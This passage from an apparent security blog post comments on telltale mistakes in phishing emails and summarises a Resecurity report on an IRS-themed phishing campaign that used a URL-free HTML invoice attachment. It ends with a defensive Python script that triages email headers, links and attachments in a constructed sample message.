For example, most of the phishing scams we receive are easy to spot because they contain at least one, and often several, very obvious mistakes.
Incorrect logos, incomprehensible grammar, outright ignorance about our online identity, weird spelling errors, absurd punctuation!!!!, or bizarre scenarios (no, your surveillance spyware definitely did not capture live video through the black electrical tape we stuck over our webcam)…
…all these lead us instantly and unerringly to the [Delete] button.
If you don't know our name, don't know our bank, don't know which languages we speak, don't know our operating system, don't know how to spell 'respond immediately', heck, if you don't realise that Riyadh is not a city in Austria, you're not going to get us to click.
That's not so much because you'd stand out as a scammer, but simply that your email would advertise itself as 'clearly does not belong here', or as 'obviously sent to the wrong person', and we'd ignore it even if you were a legitimate business. (After that, we'd probably blocklist all your emails anyway, given your attitude to accuracy, but that's an issue for another day.)
Indeed, as we've often urged on Naked Security, if spammers, scammers, phishers or other cybercriminals do make the sort of blunder that gives the game away, make sure you spot their mistakes, and make them pay for their blunder by deleting their message at once.
Threat intelligence firm Resecurity details how crooks are delivering IRS tax scams and phishing attacks posing as government vendors.
Cybercriminals are using advanced tactics in their phishing kits that give spoofed e-mails carrying malicious attachments a high delivery success rate, timed right before the 2021 IRS income tax return deadline in the U.S. (April 18th, 2022). A notable campaign was detected that used phishing e-mails impersonating the IRS and, in particular, one of the industry vendors that provide solutions to government agencies, including e-mailing, digital communications management and the content delivery system that informs citizens about various updates.
Cybercriminals purposely choose times when all of us are busy with taxes and preparing for holidays (e.g., Easter), which is why you need to be especially careful during these periods.
The IT services vendor the actors impersonated is widely used by major federal agencies, including the DHS, and by state and city websites across the U.S. The identified phishing e-mail warned victims about overdue payments to the IRS that were to be paid via PayPal; the e-mail contained an HTML attachment imitating an electronic invoice.
Notably, the e-mail doesn't contain any URLs and was delivered to the victim's inbox without being flagged as potential spam. Based on the inspected headers, the e-mail was sent through multiple 'hops', primarily network hosts and domains registered in the U.S.
It's worth noting that, on the date of detection, none of the involved hosts had previously been 'blacklisted', nor did they show any signs of negative IP or abnormal domain reputation.
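The triage described above (walking the Received hops, confirming the absence of URLs and spotting the HTML attachment) can be reproduced with the standard library. This is an added example, not Resecurity's tooling; the raw message is constructed, with example.net/example.org hosts and documentation IP ranges standing in for the campaign's infrastructure.

```python
import re
from email import message_from_string, policy

# Constructed sample, not the e-mail from the campaign: two relay hops, no URL
# anywhere in the message, and an HTML attachment posing as an invoice.
SAMPLE_RAW = """\
Received: from relay2.example.net (relay2.example.net [203.0.113.20])
    by mx.victim.example; Thu, 14 Apr 2022 10:02:11 +0000
Received: from mail1.example.org (mail1.example.org [198.51.100.7])
    by relay2.example.net; Thu, 14 Apr 2022 10:02:09 +0000
From: "Tax Notice" <notice@example.org>
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Your payment is overdue. Please open the attached invoice.
--b1
Content-Type: text/html; name="invoice.html"
Content-Disposition: attachment; filename="invoice.html"

<html><body>Invoice</body></html>
--b1--
"""

HOP_RE = re.compile(r"from\s+(?P<src>\S+)\s+\((?P<info>[^)]*)\)\s+by\s+(?P<dst>[^\s;]+)", re.I)
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)

def received_hops(msg):
    """Return (sending host, its IP, receiving host) per Received header, oldest hop first."""
    hops = []
    for value in msg.get_all("Received", []):
        m = HOP_RE.search(str(value))
        if m:
            ip = IP_RE.search(m.group("info"))
            hops.append((m.group("src"), ip.group(1) if ip else None, m.group("dst")))
    return hops[::-1]  # each relay prepends its header, so reverse into delivery order

def triage(raw):
    """Summarise hop chain, URL count and HTML attachments of a raw RFC 5322 message."""
    msg = message_from_string(raw, policy=policy.default)
    urls = [u for part in msg.walk() if part.get_content_maintype() == "text"
            for u in URL_RE.findall(part.get_content())]
    html_attachments = [p.get_filename() for p in msg.iter_attachments()
                        if p.get_content_type() == "text/html"]
    return {"hops": received_hops(msg), "url_count": len(urls),
            "html_attachments": html_attachments,
            # no link for a URL scanner to flag, so the attachment itself needs inspection
            "needs_attachment_review": bool(html_attachments) and not urls}
```

The hop IPs are what you would feed to reputation lookups; as the text notes, a clean reputation at detection time is not evidence that the message is benign.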